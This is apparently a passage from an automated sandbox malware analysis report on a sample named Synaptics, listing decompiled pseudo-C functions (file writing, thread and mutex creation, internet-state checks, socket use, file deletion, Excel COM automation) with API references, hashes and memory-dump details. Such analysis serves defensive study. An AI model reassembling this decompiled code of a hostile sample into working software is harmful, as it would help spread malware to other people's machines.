                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExtentPoint32Text
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 223599850-0
                                                                                                                                                                                          • Opcode ID: efb2d78b2ad38a5a788e7adebc90b34ed57604606a9e4e9179171ca3c6b050d1
                                                                                                                                                                                          • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: efb2d78b2ad38a5a788e7adebc90b34ed57604606a9e4e9179171ca3c6b050d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F94 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00405F94(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E004061D0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                                                                                                                                                                          0x00405f9c
                                                                                                                                                                                          0x00405fa2
                                                                                                                                                                                          0x00405fae
                                                                                                                                                                                          0x00405fb2
                                                                                                                                                                                          0x00405fbb
                                                                                                                                                                                          0x00405fc0
                                                                                                                                                                                          0x00405fc2
                                                                                                                                                                                          0x00405fc7
                                                                                                                                                                                          0x00405fc9
                                                                                                                                                                                          0x00405fcc
                                                                                                                                                                                          0x00405fcc
                                                                                                                                                                                          0x00405fc7
                                                                                                                                                                                          0x00405fcf
                                                                                                                                                                                          0x00405fda

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                                                                                                                                                            • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                            • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                            • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC), ref: 00406228
                                                                                                                                                                                            • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                            • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                            • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                            • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                                          • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                          • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409974 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00409974(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                                                                                                          0x00409977
                                                                                                                                                                                          0x00409988
                                                                                                                                                                                          0x0040998f
                                                                                                                                                                                          0x00409991
                                                                                                                                                                                          0x00409991
                                                                                                                                                                                          0x0040999f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                          • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00478230 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 21%
                                                                                                                                                                                          			E00478230(void* __eax, void* __ecx, void* __edx, void* __ebp) {
				char _v24;
				void* __ebx;
				void* __esi;
				void* _t15;
				void* _t16;

				E004781D4(__eax, __eax, __ecx, _t15, __edx, _t16); // executed
				_push(E004065AC(__edx));
				_push(E00478268);
				_push(5);
				_push(0);
				_push( &_v24); // executed
				L00417E04(); // executed
				return E004781BC( &_v24, _t15, _t16);
			}








                                                                                                                                                                                          0x0047823d
                                                                                                                                                                                          0x00478249
                                                                                                                                                                                          0x0047824a
                                                                                                                                                                                          0x0047824f
                                                                                                                                                                                          0x00478251
                                                                                                                                                                                          0x00478257
                                                                                                                                                                                          0x00478258
                                                                                                                                                                                          0x00478267

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004781D4: 741EBC30.OLE32(00000000,?,00000000,00478221,?,?,Excel.Application,00000000,?,00478242), ref: 00478201
                                                                                                                                                                                          • 7426B690.OLE32(00000000,00000000,00000005,00478268,00000000), ref: 00478258
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: 7426B690
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3899874126-0
                                                                                                                                                                                          • Opcode ID: 785669ee39f9c79f4717ff3d995cc01253c4d274ddd2fb4442236d13fad275cd
                                                                                                                                                                                          • Instruction ID: f8e174c70090632150d231ab812d8d7e42eb955a1dbdae64a2f8568beb472c63
                                                                                                                                                                                          • Opcode Fuzzy Hash: 785669ee39f9c79f4717ff3d995cc01253c4d274ddd2fb4442236d13fad275cd
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFD05B717847102BD600F56D0C47BD7318C8B45729F5445BE7518D72C3FE6D8D1542EA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00498248 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00498248(void* __eax, void* __ecx) {
				void* _t4;
				DWORD* _t8;

				 *0x49f1dc = E00441704(__eax);
				_t4 = CreateThread(0, 0, E00497CF0, 0, 0, _t8); // executed
				return _t4;
			}





                                                                                                                                                                                          0x00498253
                                                                                                                                                                                          0x00498266
                                                                                                                                                                                          0x0049826d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                          • Opcode ID: cbb4e7eea467e225b00a60faa0712dba27865e89d4f5a63d4fcb6e00c7bf2234
                                                                                                                                                                                          • Instruction ID: d20cfee4eb2c6f302c38dd3c40418a867a3644e10e3952504ee4e450d92dbdcf
                                                                                                                                                                                          • Opcode Fuzzy Hash: cbb4e7eea467e225b00a60faa0712dba27865e89d4f5a63d4fcb6e00c7bf2234
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81C08CB03E83007EF610A7A6AD83F2529888344F25F30003BF606ED1C3C8E92C48062C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A58 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409A58(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                                                                                                          0x00409a63
                                                                                                                                                                                          0x00409a6b
                                                                                                                                                                                          0x00409a74
                                                                                                                                                                                          0x00409a75
                                                                                                                                                                                          0x00409a78
                                                                                                                                                                                          0x00409a78

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00496E89,00000000,00496FE6), ref: 00409A63
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                          • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406F90 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                                                                                          0x00406f93
                                                                                                                                                                                          0x00406f9b
                                                                                                                                                                                          0x00406fa6
                                                                                                                                                                                          0x00406fac

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNEL32(?,004742AD,004742AC,?,00474274,00000000,000000FF,00000000,00000000,004742AC), ref: 00406FA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateMutex
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1964310414-0
                                                                                                                                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                                                                                          • Instruction ID: 3e008c22956fc280003415e3679d606a6b79cccc06a071e67c7aa2054a22c523
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96C0127315024DAFCB00EEA9DC05D9B33DC5728609B408425B929C7100C139E5508B60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040991C Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040991C(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                                                                                                                                                          0x00409939
                                                                                                                                                                                          0x0040993f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 00409939
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                                                                                                                                                          • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00474D34 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00474D34(void* __ecx) {
				long _v4;
				int _t4;

				_v4 = 0;
				_t4 = InternetGetConnectedState( &_v4, 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}





                                                                                                                                                                                          0x00474d37
                                                                                                                                                                                          0x00474d41
                                                                                                                                                                                          0x00474d49
                                                                                                                                                                                          0x00474d4d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetGetConnectedState.WININET(?,00000000), ref: 00474D41
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConnectedInternetState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 97057780-0
                                                                                                                                                                                          • Opcode ID: a7ed79bf9b14b00b121dfe9b039b901474b7428766eb3fab445e489e84394f62
                                                                                                                                                                                          • Instruction ID: 43e6c75ac53b68531ecb640d7992dcd85e2c788aaf0ad89392417452c0857e78
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7ed79bf9b14b00b121dfe9b039b901474b7428766eb3fab445e489e84394f62
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFC02BB33382001ED700EFB64C41F2E22CCDB40705F404C3EF080C2140E230C1404312
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409F54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00409F54(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                                                                                          0x00409f61
                                                                                                                                                                                          0x00409f69
                                                                                                                                                                                          0x00409f6d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00496EA8,00000000,00496FE6), ref: 00409F61
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4241100979-0
                                                                                                                                                                                          • Opcode ID: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                                                                                                                                                          • Instruction ID: d06271dbac5e2ad416fd06201c67f134fcd2da453fbdd723ce63acec7380a99a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 07B092A27503411AEE0035FA2CC2B2A008CA74861AF110A3EF656E61C2D47AC8184068
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047CD00 Relevance: 1.5, APIs: 1, Instructions: 11networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                          • Opcode ID: da8abf5903f94204f6ea87b64a01f6fd3d4efd7f7f6d8b3f73d9ab8c59ab69f8
                                                                                                                                                                                          • Instruction ID: 2e709947118e8dc25288039f9a57c0887e95812f9ab550a64733bdbedfb98feb
                                                                                                                                                                                          • Opcode Fuzzy Hash: da8abf5903f94204f6ea87b64a01f6fd3d4efd7f7f6d8b3f73d9ab8c59ab69f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24C09BB51141086F5200DBCDDC41C6773ECDB986007004135B914C7321D570FD108675
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409BAC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00409BAC(void* __eax) {
				int _t4;

				_t4 = DeleteFileA(E00404E80(__eax)); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                                                                                          0x00409bb7
                                                                                                                                                                                          0x00409bbf
                                                                                                                                                                                          0x00409bc3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,?,0047618D,00000000,004761BC,?,00000000,?,004964CE,?,?,022B2A8C,022B2A8C,00000000,00000000,00000000), ref: 00409BB7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4033686569-0
                                                                                                                                                                                          • Opcode ID: 73a910ca069631e58c55fc5b667482b586c6bae095a696cf5f4582313e541121
                                                                                                                                                                                          • Instruction ID: bd52c39aee45128e914ff2b3ce99c6b4069be5bada1e4d33ed405c928c74b441
                                                                                                                                                                                          • Opcode Fuzzy Hash: 73a910ca069631e58c55fc5b667482b586c6bae095a696cf5f4582313e541121
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37B012E27102400ACF0079FE3CC190E00CDA74811EF110D3FF14AE2243E83ED4180118
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045D2F8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0045D2F8(signed int __eax, void* __ecx) {
				struct _ITEMIDLIST** _t10;

				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
				return  *_t10;
			}




                                                                                                                                                                                          0x0045d307
                                                                                                                                                                                          0x0045d310

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
